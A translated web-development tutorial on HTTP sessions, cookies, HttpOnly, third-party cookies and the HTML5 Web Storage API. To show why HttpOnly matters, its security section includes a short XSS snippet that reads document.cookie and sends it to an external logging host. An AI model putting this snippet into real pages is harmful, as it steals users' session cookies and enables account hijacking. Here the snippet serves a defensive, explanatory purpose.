What is a Session?

In computer science, and especially in networking, a session is a persistent association between the user (or user agent) side and the server side that serves as a mechanism for exchanging packets. Sessions are an important part of many network protocols (e.g. telnet or FTP). When the transport protocol has no session layer (e.g. UDP), or when connections are not kept alive for long (e.g. HTTP), maintaining the session relies on higher-level information carried in the transmitted data.

The session mechanism is a server-side mechanism in which the server uses a hash table (or a similar structure) to store information. When the program needs a session for a client request, the server first checks whether the request already contains a session identifier (the session id). If it does, a session was created for this client earlier, and the server retrieves it by its session id. If the request does not contain a session id, the server creates a session for this client and generates a session id for it. The session id should be a string that is never repeated and whose pattern cannot easily be guessed or forged. The session id is returned to the client in the response, and the client saves it.
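The lookup-or-create logic described above can be sketched in a few lines of Node.js. This is only a minimal illustration: the names `sessions`, `newSessionId`, and `getOrCreateSession` are made up for this example, and treating an unknown session id like a missing one is an assumption, not something the text specifies.

```javascript
const { randomBytes } = require('node:crypto');

// In-memory session table: session id -> session data (the "hash table").
const sessions = new Map();

// Generate an id that is unique in practice and hard to guess
// (128 random bits, hex-encoded).
function newSessionId() {
  return randomBytes(16).toString('hex');
}

// Return the session for the id carried by the request, or create a new one.
// `requestSessionId` is whatever id the client sent (undefined if none).
// Assumption: an id the server does not know is treated like a missing id.
function getOrCreateSession(requestSessionId) {
  if (requestSessionId && sessions.has(requestSessionId)) {
    return { id: requestSessionId, data: sessions.get(requestSessionId), isNew: false };
  }
  const id = newSessionId();
  const data = {};
  sessions.set(id, data);
  return { id, data, isNew: true };
}
```

A real server would also expire old sessions and would usually keep them in shared storage rather than in process memory.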

A cookie is a small piece of text that the server stores on the local machine and that the browser sends back to the same server with each request. IETF RFC 2965, HTTP State Management Mechanism, is the generic cookie specification (it has since been superseded by RFC 6265). The cookie mechanism maintains state on the client side: it stores session state on the user's machine. Cookies are an effort to work around the statelessness of the HTTP protocol. The web server sends cookies to the client in HTTP headers; the browser parses these cookies, saves them as a local file, and automatically attaches them to any request to the same server.

Cookies are normally distributed by extending the HTTP protocol: the server tells the browser to create a cookie by adding a special line (Set-Cookie) to the HTTP response headers. The browser then sends cookies back to the server automatically, in the background, according to certain rules. It checks all stored cookies, and if the scope of a cookie covers the location of the requested resource, it attaches the cookie to the HTTP request headers for that resource.

The content of a cookie consists of a name, a value, an expiration time, a path and a domain. The path and domain together constitute the scope of the cookie. If no expiration time is set, the cookie lives for the duration of the browser session and disappears when the browser window is closed; such a cookie is called a session cookie. Session cookies are generally kept in memory rather than on the hard disk, although this behavior is not regulated by the specification. If an expiration time is set, the browser saves the cookie to the hard disk, and after the browser is closed and opened again the cookie remains valid until the expiration time has passed. Cookies stored on the hard disk can be shared between different browser processes, such as two IE windows. Cookies stored in memory are handled differently by different browsers.
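To make the idea of scope concrete, here is a rough sketch of how a browser might decide whether to attach a cookie to a request. It loosely follows the domain and path matching rules of RFC 6265 but leaves out details such as IP addresses and host-only cookies; the function names and the shape of the `cookie` object are assumptions made for this example.

```javascript
// Does the cookie's domain cover the request host?
// Simplified: exact match, or the host ends with "." + cookie domain.
function domainMatches(cookieDomain, host) {
  const d = cookieDomain.replace(/^\./, '').toLowerCase();
  const h = host.toLowerCase();
  return h === d || h.endsWith('.' + d);
}

// Does the cookie's path cover the request path?
// The cookie path must be a prefix that ends at a "/" boundary.
function pathMatches(cookiePath, requestPath) {
  if (requestPath === cookiePath) return true;
  if (!requestPath.startsWith(cookiePath)) return false;
  return cookiePath.endsWith('/') || requestPath[cookiePath.length] === '/';
}

// A cookie is sent only if it is in scope and has not expired.
// `cookie.expires` is a Date, or undefined for a session cookie.
function shouldSend(cookie, host, path, now = new Date()) {
  if (cookie.expires && cookie.expires <= now) return false;
  return domainMatches(cookie.domain, host) && pathMatches(cookie.path, path);
}
```

For instance, a cookie with domain `example.com` and path `/app` would be sent to `www.example.com/app/page`, but not to `www.example.com/application` or to `badexample.com/app`.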

The session mechanism maintains state on the server side. However, the server still needs the client to present an identifier, so the session mechanism may rely on the cookie mechanism to store that identifier on the client. Sessions also provide a convenient way to manage per-user global variables.

A session is specific to each user. The variable values are stored on the server, and a session ID distinguishes which user's session variables are in use. This ID is sent back to the server by the user's browser on each access; when the client has cookies disabled, the ID can instead be passed back to the server as a GET parameter.

Because HTTP is stateless, sessions and cookies emerged so that all pages under a given domain can share certain data. The flow of a client accessing the server is as follows:

  • First, the client sends an HTTP request to the server.
  • The server accepts the request, creates a session, and sends an HTTP response to the client. The response includes a Set-Cookie header that carries the session ID. The Set-Cookie format is as follows:

Set-Cookie: name=value[; expires=date][; domain=domain][; path=path][; secure]

  • On the client's second request, if the server previously sent a Set-Cookie header, the browser automatically adds the cookie to the request headers.
  • The server receives the request, parses the cookie, validates the information, and returns the response to the client once the check succeeds.
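The last step, where the server takes the cookie apart, might look roughly like the sketch below. The function name `parseCookieHeader` and the cookie name `sessionId` are assumptions for illustration; real frameworks usually ship their own cookie parser.

```javascript
// Parse a Cookie request header such as "sessionId=abc123; theme=dark"
// into a plain object { sessionId: 'abc123', theme: 'dark' }.
function parseCookieHeader(header) {
  const cookies = {};
  if (!header) return cookies;
  for (const pair of header.split(';')) {
    const eq = pair.indexOf('=');
    if (eq === -1) continue; // skip malformed pairs without "="
    const name = pair.slice(0, eq).trim();
    const value = pair.slice(eq + 1).trim(); // the value may itself contain "="
    if (name) cookies[name] = value;
  }
  return cookies;
}
```

The server would then look up `parseCookieHeader(header).sessionId` in its session table and reject the request if no matching session exists.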

Notes:

  • Cookies are only one way to implement sessions. They are the most common, but not the only one. When cookies are disabled, the session id can be carried in other ways, such as in the URL.
  • Most sites today use session + cookie. In theory, using only sessions without cookies, or only cookies without sessions, can also maintain session state, but for the reasons below neither is usually used alone.
  • With sessions, the client only needs to save an id, while the bulk of the data is saved on the server. If everything were stored in cookies, the client would not have enough space for large amounts of data.
  • If you use only cookies and no session, all account information is stored on the client, and once it is hijacked, all of it leaks. The client-side data also grows, and so does the amount of data sent over the network.

HTTP is a stateless protocol, so to carry information across requests, cookies are commonly used to mark the visitor's state. Anyone who obtains this cookie can assume the visitor's identity and break into a personal account or website.

For a website, an XSS vulnerability means that an intruder can execute arbitrary JS in the victim's browser. Obtaining cookies then becomes very easy: cookies are exposed through the browser's document object (document.cookie), so a script can read them and take over another person's identity. A very simple XSS attack statement is as follows.

url = window.top.location.href;
cookie = document.cookie;
c = new Image();
c.src = "http://www.xss-log-server.com/c.php?c="+cookie+"&u="+url;

Some websites take this problem into account and bind the cookie to the browser, for example to the browser's User-Agent, so that the cookie is considered invalid if the User-Agent changes. This method has a major weakness: an intruder who can steal the cookie can obtain the User-Agent at the same time. Binding the cookie to the client's IP address is not reliable either; for example, a home ADSL line gets a different IP address every time it connects.

Then how can we secure our sensitive cookies? Microsoft Internet Explorer 6 Service Pack 1 and later support the cookie attribute HttpOnly. HttpOnly is set in the same way as other attributes such as domain. Once HttpOnly is set, the cookie is no longer visible through the browser's document object (document.cookie). Normal browsing is not affected, because the cookie is still placed in the request headers the browser sends (including Ajax requests). Applications generally do not need to manipulate these sensitive cookies in JS, so we can set HttpOnly on sensitive cookies and leave it off for cookies that the site needs to manipulate with JS. This protects the cookie information while preserving the basic functionality of the site.

The following example shows how to set HttpOnly (the attribute name is not case-sensitive).

Set-Cookie: <name>=<value>[; <name>=<value>] [; expires=<date>][; domain=<domain_name>][; path=<some_path>][; secure][; HttpOnly]

Current mainstream browsers all basically support the HttpOnly attribute.
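As an illustration, a server-side helper that assembles such a header could look like the sketch below. The function `buildSetCookie` and its option names are hypothetical, not part of any particular framework.

```javascript
// Build the value of a Set-Cookie header from a name, a value,
// and optional attributes.
function buildSetCookie(name, value, options = {}) {
  const parts = [`${name}=${encodeURIComponent(value)}`];
  if (options.expires) parts.push(`Expires=${options.expires.toUTCString()}`);
  if (options.domain) parts.push(`Domain=${options.domain}`);
  if (options.path) parts.push(`Path=${options.path}`);
  if (options.secure) parts.push('Secure');
  if (options.httpOnly) parts.push('HttpOnly'); // hide the cookie from document.cookie
  return parts.join('; ');
}
```

In a Node.js HTTP handler the result could be sent with something like `response.setHeader('Set-Cookie', buildSetCookie('sessionId', id, { path: '/', httpOnly: true }))`, where `id` is the session id generated by the server.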

First-party cookies and third-party cookies

Cookies are usually divided into two categories: first-party cookies and third-party cookies. Both are small pieces of data that a website stores on the client, and both are stored by a certain domain and can only be accessed by that domain. The difference between them is not really technical, but lies in how they are used. For example, if you visit the website www.a.com and it sets a cookie, that cookie can only be read by pages under the domain www.a.com; it is a first-party cookie. If a page on www.a.com embeds an image from www.b.com and a cookie is set when the browser requests that image from www.b.com, then that cookie can only be accessed by the domain www.b.com, not by www.a.com. Because we are actually visiting www.a.com but a cookie under the domain www.b.com gets set, it is called a third-party cookie.
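The distinction can be expressed as a simple comparison between the page being visited and the resource being requested. The sketch below is deliberately simplified: it compares full hostnames, whereas real browsers compare registrable domains, and the function name `cookieParty` is made up for this example.

```javascript
// Classify a resource request as first-party or third-party
// relative to the page the user is visiting.
// Simplification: compares full hostnames only.
function cookieParty(pageUrl, resourceUrl) {
  const pageHost = new URL(pageUrl).hostname;
  const resourceHost = new URL(resourceUrl).hostname;
  return pageHost === resourceHost ? 'first-party' : 'third-party';
}
```

With the example above, a cookie set while loading `http://www.b.com/pixel.gif` from a page on `http://www.a.com/` would be classified as third-party.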

Using first-party and third-party cookies for data statistics:

  • First-party cookies: Their biggest advantage is a high acceptance rate. Unless the user refuses cookies altogether, first-party cookies are accepted. So, absent special requirements, data collected by analysis tools with first-party cookies will be more accurate than with third-party cookies.
  • Third-party cookies: Their acceptance rate is lower than that of first-party cookies (although mainstream browsers accept third-party cookies that carry a P3P policy by default, so the acceptance rate can reach 90% or even over 95%), but in some cases they enable things that first-party cookies cannot. For example, suppose we need to track a website that spans multiple domains: a user clicks an ad and lands on a page under domain A, perhaps visits pages under other domains, and finally completes registration on a page under domain B. The ad click can be tracked on the page under domain A, and the registration on the page under domain B. With first-party cookies, we create one cookie for domain A and another for domain B; each can be associated with actions on pages under its own domain, but the two cannot be associated with each other. With third-party cookies, no matter how many domains there are, there is only one cookie, belonging to the third-party domain, which all domains of the website share, so all behaviors can be associated and analyzed.

For script-based web analytics tools that collect data:

  • Cookies are a must; nothing can be analyzed without them.
  • First-party cookies have a high acceptance rate and are more accurate, so use them unless you have special needs.
  • Third-party cookies can track across domains and suit such special needs.

Cookies and special characters

This happened to me: a special character in a cookie value caused some phones to get a 5xx error when opening the site. After analysis, it turned out that the character was not supported in cookies on some Android phone models.

Why does such a situation occur? Let’s take a look at some notes on the use of cookies.

Cookie compatibility issues

There are 2 different versions of the cookie format. The first version, which we call Cookie Version 0, was originally developed by Netscape, and is also supported by almost all browsers. The newer version, Cookie Version 1, is based on the RFC 2109 document.

The characters allowed in cookie content differ between cookie versions. In Cookie Version 0, certain special characters, such as spaces, square brackets, parentheses, the equal sign (=), comma, double quotes, slash, question mark, @ symbol, colon, and semicolon, cannot be used in the content of a cookie. Although these characters are allowed in Cookie Version 1, the newer specification is still not supported by all browsers, so to be on the safe side, we should avoid using these characters in cookie content.

The relevant syntax defined in RFC 2109:

4.1  Syntax:  General

   The two state management headers, Set-Cookie and Cookie, have common
   syntactic properties involving attribute-value pairs.  The following
   grammar uses the notation, and tokens DIGIT (decimal digits) and
   token (informally, a sequence of non-special, non-white space
   characters) from the HTTP/1.1 specification [RFC 2068] to describe
   their syntax.

   av-pairs        =       av-pair *(";" av-pair)
   av-pair         =       attr ["=" value]        ; optional value
   attr            =       token
   value           =       word
   word            =       token | quoted-string

   Attributes (names) (attr) are case-insensitive.  White space is
   permitted between tokens.  Note that while the above syntax
   description shows value as optional, most attrs require them.

   NOTE: The syntax above allows whitespace between the attribute and
   the = sign.

The relevant definitions from RFC 2068:

Many HTTP/1.1 header field values consist of words separated by LWS
   or special characters. These special characters MUST be in a quoted
   string to be used within a parameter value.

          token          = 1*<any CHAR except CTLs or tspecials>

          tspecials      = "(" | ")" | "<" | ">" | "@"
                         | "," | ";" | ":" | "\" | <">
                         | "/" | "[" | "]" | "?" | "="
                         | "{" | "}" | SP | HT

As a word of advice, never store special characters directly in cookies; if you must store them, encode them first.
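One possible way to follow this advice in JavaScript is to percent-encode values before writing them and decode them after reading. The sketch below is an assumption about how one might do it, not a required approach; the helper names are invented. Note that `encodeURIComponent` leaves parentheses untouched, so they are escaped separately here.

```javascript
// Characters from the RFC 2068 "tspecials" list, including space and tab.
const TSPECIALS = /[()<>@,;:\\"\/\[\]?={} \t]/;

// True if the raw value contains a character that is unsafe in a cookie value.
function hasSpecialChars(value) {
  return TSPECIALS.test(value);
}

// Encode on write: percent-encode, then also escape "(" and ")",
// which encodeURIComponent does not touch.
function encodeCookieValue(value) {
  return encodeURIComponent(value).replace(
    /[()]/g,
    (c) => '%' + c.charCodeAt(0).toString(16).toUpperCase()
  );
}

// Decode on read.
function decodeCookieValue(encoded) {
  return decodeURIComponent(encoded);
}
```

After encoding, the value contains only letters, digits, `%`, and a few harmless punctuation marks, so it should survive on clients that only accept Version 0 cookies.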

LocalStorage and sessionStorage

Web Storage in HTML5 includes two types of storage: sessionStorage and localStorage. sessionStorage stores data locally for the duration of a session; the data can only be accessed by pages in the same session and is destroyed when the session ends. localStorage stores data under a domain that needs to persist locally, and the data remains accessible until it is deleted. So the main difference between sessionStorage and localStorage is the lifecycle of the data: sessionStorage data lives for one session, while localStorage data never expires unless it is actively deleted.

Similarities, differences, advantages and disadvantages of Web Storage and cookies

Web Storage and cookies have a lot in common.

  • They can both be used to store user data
  • They both store data in the form of strings
  • The data they store is limited in size

Web Storage and cookies also have differences.

  • They have different lifecycles. sessionStorage data lasts for the session and localStorage data is permanent, while cookies have a customizable lifecycle: a cookie can be given an expiration time, and its data is accessible until then.
  • They have different storage size limits. In most modern browsers the limit is about 5 MB for Web Storage and about 4 KB per cookie.
  • They differ in browser support and in their APIs.

The advantage of Web Storage is that it has more storage space and can hold more content than cookies. Cookies are sent to the server with every request, whereas Web Storage data is not, so it uses less bandwidth. The disadvantage is that cookies are supported by all browsers, while Web Storage is only supported by relatively recent ones, so if you need to be compatible with older browsers, you can't rely on Web Storage.

Web Storage API

localStorage and sessionStorage share the same API, which makes working with both very convenient. The examples below use localStorage, but they apply equally to sessionStorage.

Add key-value pairs

localStorage.setItem(key, value): setItem stores value under key. Besides setItem, you can also use localStorage.key = value or localStorage['key'] = value. Note that keys and values must be strings; if they are not, they are converted to strings (as if by toString()) before being stored. To store an object, first convert it to a string format that can be parsed back (such as JSON).

// Store a username (lilei) under the key "name"
localStorage.setItem('name', 'lilei');
// localStorage.name = 'lilei';
// localStorage['name'] = 'lilei';
// Store a user object under the key "user"
localStorage.setItem('user', JSON.stringify({id: 1, name: 'lilei'}));

Get the key value

localStorage.getItem(key): getItem returns the data stored under key. Like setItem, getItem has two equivalent forms: value = localStorage.key and value = localStorage['key']. The value obtained is a string; if you need another type, you have to convert it manually.

// Get the value stored under the key "name"
var name = localStorage.getItem('name');
// var name = localStorage.name;
// var name = localStorage['name'];
// Get the value stored under the key "user"
var user = JSON.parse(localStorage.getItem('user'));
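Since storing and reading objects always involves the same JSON round trip, it can be wrapped in two small helpers. This is just one possible sketch: `saveJSON` and `loadJSON` are invented names, and the `storage` parameter is assumed to be localStorage, sessionStorage, or any object with the same setItem/getItem methods.

```javascript
// Store any JSON-serializable value under `key`.
function saveJSON(storage, key, value) {
  storage.setItem(key, JSON.stringify(value));
}

// Read it back; returns `fallback` if the key is missing
// or the stored text is not valid JSON.
function loadJSON(storage, key, fallback = null) {
  const text = storage.getItem(key);
  if (text === null) return fallback;
  try {
    return JSON.parse(text);
  } catch (err) {
    return fallback;
  }
}
```

In a browser this would be used as `saveJSON(localStorage, 'user', {id: 1, name: 'lilei'})` followed by `loadJSON(localStorage, 'user')`. Passing the storage object in as a parameter also makes the helpers easy to try out with sessionStorage.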

Delete key-value pairs

localStorage.removeItem(key): removeItem removes the item with the specified key. localStorage has no concept of data expiration; data that is no longer valid has to be removed manually by the developer.

var name = localStorage.getItem('name'); // 'lilei'
// Remove the value stored under the key "name"
localStorage.removeItem('name');
name = localStorage.getItem('name'); // null
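Because localStorage itself never expires data, an expiration time has to be emulated by the application if it is needed. One common approach, sketched here under the assumption that values are JSON-serializable, is to store a timestamp next to the value and check it on read. The function names and the `expiresAt` field are made up for this example.

```javascript
// Store `value` together with an absolute expiry timestamp
// (milliseconds since the epoch).
function setWithExpiry(storage, key, value, ttlMs, now = Date.now()) {
  storage.setItem(key, JSON.stringify({ value, expiresAt: now + ttlMs }));
}

// Return the stored value, or null if it is missing or expired.
// Expired entries are removed when they are read.
function getWithExpiry(storage, key, now = Date.now()) {
  const text = storage.getItem(key);
  if (text === null) return null;
  const entry = JSON.parse(text);
  if (now >= entry.expiresAt) {
    storage.removeItem(key);
    return null;
  }
  return entry.value;
}
```

For example, `setWithExpiry(localStorage, 'token', 'abc', 60 * 1000)` would keep the value readable for roughly one minute. Entries that are never read again stay in storage, so a periodic cleanup may still be needed.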

Clear all key-value pairs

localStorage.clear(): clear deletes all stored content. It differs from removeItem in that removeItem removes one item, while clear removes everything.

// Clear localStorage
localStorage.clear();
var len = localStorage.length; // 0

Get the localStorage property name (key name)

localStorage.key(index): key returns the name of the key at the specified index. It can be used to iterate over the keys stored in localStorage. The order of the keys is decided by the browser, so do not rely on it.

localStorage.setItem('name', 'lilei');
var key = localStorage.key(0); // 'name'
localStorage.setItem('age', 10);
// The key order is decided by the browser, so either order is possible here
key = localStorage.key(0); // 'age' or 'name'
key = localStorage.key(1); // the other key

Get the number of key-value pairs stored in localStorage

localStorage.length: the length property returns the number of key-value pairs in localStorage.

localStorage.setItem('name', 'lilei');
var len = localStorage.length; // 1
localStorage.setItem('age', 10);
len = localStorage.length; // 2
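Combining key(index) with length gives a simple way to walk through everything in a storage area. A minimal sketch, with `storageEntries` being a name invented for this example and `storage` assumed to be localStorage, sessionStorage, or a compatible object:

```javascript
// Collect every key/value pair from a Storage-like object
// using length and key(index).
function storageEntries(storage) {
  const entries = {};
  for (let i = 0; i < storage.length; i++) {
    const key = storage.key(i);
    entries[key] = storage.getItem(key);
  }
  return entries;
}
```

Calling `storageEntries(localStorage)` in a browser returns a plain object snapshot, which is handy for debugging or for exporting the stored data.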

Web Storage events

The storage event is fired when the stored data changes. Unlike events such as click, which go through capture and bubbling, the storage event is more like a notification and cannot be cancelled. It is fired in other windows of the same domain, but not in the window that made the change (i.e., the current window). The event object has the following properties:

  • oldValue: the value before the update. If the key is newly added, this property is null.
  • newValue: the value after the update. If the key was deleted, this property is null.
  • url: the URL of the page that triggered the storage event.
  • key: the name of the key that changed.

function storageChanged(event) {
    // Log which key changed, its old and new values, and the page that changed it
    console.log(event.key, event.oldValue, event.newValue, event.url);
}

window.addEventListener('storage', storageChanged, false);
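The properties listed above are enough to tell what kind of change happened. The sketch below shows one way to interpret them; `describeStorageChange` is a hypothetical helper, and the listener is only registered when the code runs in a browser.

```javascript
// Describe what a storage event represents,
// based on its key, oldValue, and newValue.
function describeStorageChange(event) {
  if (event.key === null) return 'cleared';      // clear() was called
  if (event.oldValue === null) return 'added';   // key did not exist before
  if (event.newValue === null) return 'removed'; // key was deleted
  return 'updated';
}

// Register the listener only when running in a browser.
if (typeof window !== 'undefined') {
  window.addEventListener('storage', (event) => {
    console.log(describeStorageChange(event), event.key, event.url);
  });
}
```

To see it in action, open the same site in two tabs, run the snippet in one of them, and change a localStorage value from the other.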

Web Storage Application Scenarios

Since every HTTP request carries cookie information, cookies should be kept as lean as possible. One of their most common uses is determining whether a user is logged in: when a user logs in, the server puts an encrypted identifier unique to that user into a cookie, and on later requests this value can be read to determine whether the current user is logged in.

With an intuitive understanding of these differences, we can discuss the application scenarios of the three.

Given its characteristics, Web Storage is mainly used to store data that changes infrequently and is not sensitive, such as national province, city, and county information. It can also store less important user-related data, such as the user's avatar address, theme color, or shopping cart data. Such information can be served from the local copy first for quick display, and then updated (for example the avatar address and theme color) once it has actually been read from the server. In addition, thanks to the storage event, Web Storage can also be used for communication between different windows of the same domain.
